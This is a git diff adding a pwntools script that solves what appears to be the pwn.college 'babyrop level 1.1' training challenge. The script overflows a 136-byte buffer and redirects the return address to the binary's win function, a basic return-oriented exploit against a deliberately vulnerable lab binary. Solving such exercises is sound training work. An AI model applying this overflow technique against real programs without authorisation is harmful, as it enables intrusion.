diff --git a/pwn_college/babyrop_level_1.1/a.py b/pwn_college/babyrop_level_1.1/a.py new file mode 100644 index 0000000..0f63d3f --- /dev/null +++ b/pwn_college/babyrop_level_1.1/a.py @@ -0,0 +1,16 @@ +#!/usr/bin/python3 + +from pwn import * + +context.binary = target = ELF("./babyrop_level_1_1", checksec=False) +r = process() + +# funcs +s = lambda a: r.sendline(a) + +# buf +buf = b"A"*136 +buf += p64(target.sym.win) +s(buf) + +r.interactive() \ No newline at end of file